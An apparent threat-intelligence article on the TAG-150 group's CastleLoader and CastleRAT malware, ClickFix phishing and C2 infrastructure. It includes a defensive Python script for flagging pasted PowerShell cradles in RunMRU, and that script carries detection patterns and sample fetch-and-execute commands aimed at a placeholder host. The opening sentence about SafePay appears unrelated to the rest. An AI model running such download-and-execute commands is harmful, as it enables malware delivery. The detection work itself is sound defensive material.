SafePay checks the installed keyboard layouts and refuses to execute on systems with a Cyrillic keyboard, a pattern that suggests Russian connections or alliances within the threat actor ecosystem.
A sophisticated new threat actor designated TAG-150 has emerged as a significant cybersecurity concern, demonstrating rapid development capabilities and technical sophistication in deploying multiple self-developed malware families since March 2025.
The group has successfully created and deployed CastleLoader, CastleBot, and their latest creation, CastleRAT, a previously undocumented remote access trojan that represents a concerning evolution in their operational capabilities.
The threat actor primarily initiates infections through Cloudflare-themed “ClickFix” phishing attacks and fraudulent GitHub repositories masquerading as legitimate applications.
Victims are deceived into copying and executing malicious PowerShell commands on their own devices, creating a seemingly user-initiated compromise that bypasses traditional security measures.
Despite limited overall engagement, the campaign achieved a remarkable 28.7% infection rate among victims who interacted with malicious links, demonstrating the effectiveness of their social engineering tactics.
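Because ClickFix victims paste the command into the Win+R Run box themselves, Explorer's RunMRU registry key often records the one-liner. The triage below is an added example (not from Recorded Future's report) that flags RunMRU entries looking like PowerShell download-and-execute cradles and decodes any `-EncodedCommand` payload; the RunMRU path is the real artifact, the heuristics are the author's, and the registry values are constructed samples.

```python
import base64
import re
from typing import Dict, List, Optional

# Explorer records Run-box history here; values are named 'a', 'b', ... and end in '\1'
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics (assumption) for pasted cradles: in-memory execution, download
# helpers, hidden window, execution-policy bypass
SUSPICIOUS = re.compile(
    r"(?i)(\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|frombase64string|mshta)\b|-w(indowstyle)?\s+hidden|-nop\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass)"
)
ENC_FLAG = re.compile(r"(?i)-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), if any."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_runmru(values: Dict[str, str]) -> List[Dict[str, Optional[str]]]:
    """Flag RunMRU entries that look like pasted PowerShell download/execute one-liners."""
    findings = []
    for name, raw in values.items():
        if name == "MRUList":          # ordering value, not a command
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw   # strip Explorer's '\1' suffix
        decoded = decode_encoded_command(cmd)
        if re.search(r"(?i)\b(powershell|pwsh)\b", cmd) and (
            SUSPICIOUS.search(cmd) or (decoded and SUSPICIOUS.search(decoded))
        ):
            findings.append({"value": name, "command": cmd, "decoded": decoded})
    return findings


def sample_runmru() -> Dict[str, str]:
    """Constructed RunMRU contents for demonstration (not real forensic data)."""
    enc = base64.b64encode("iex (irm http://example.invalid/x.ps1)".encode("utf-16-le")).decode()
    return {"MRUList": "cba",
            "a": "notepad\\1",
            "b": "powershell -w hidden -nop -c \"iex (irm http://example.invalid/verify)\"\\1",
            "c": f"powershell -enc {enc}\\1"}
```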
Recorded Future analysts identified an extensive multi-tiered infrastructure supporting TAG-150’s operations, revealing a sophisticated command-and-control architecture spanning four distinct tiers.
The infrastructure includes victim-facing Tier 1 servers hosting various malware families, intermediate Tier 2 servers accessed via RDP, and higher-level Tier 3 and Tier 4 infrastructure used for operational management and backup purposes.
This complex network design suggests advanced operational security awareness and redundancy planning.
The malware ecosystem deployed by TAG-150 serves as an initial infection vector for delivering secondary payloads including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and numerous information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.
Multi-tiered infrastructure linked to TAG-150 (Source – Recorded Future)
This diverse payload delivery capability indicates either a Malware-as-a-Service operation or strategic partnerships with other cybercriminal groups.
Advanced Persistence and Evasion Mechanisms
CastleRAT represents the most technically advanced component of TAG-150’s arsenal, available in both Python and C variants with distinct capabilities.
The malware employs a custom binary protocol that uses RC4 with hard-coded 16-byte keys to encrypt its communications.
Both variants query the geolocation API ip-api.com to obtain location information through the infected host’s public IP address, enabling geographic targeting and operational intelligence gathering.
The C variant demonstrates significantly enhanced functionality, incorporating keylogging capabilities, screen capturing, clipboard monitoring, and sophisticated process injection techniques.
Recent developments include the use of C2 dead drops hosted on Steam Community pages, an approach to command-and-control communications that leverages a legitimate gaming platform to evade detection.
The malware maintains persistence through registry modifications and employs browser process masquerading for execution, while the Python variant includes self-deletion capabilities using PowerShell commands.
These evasion techniques, combined with the group’s use of anti-detection services like Kleenscan, demonstrate TAG-150’s commitment to operational longevity and stealth.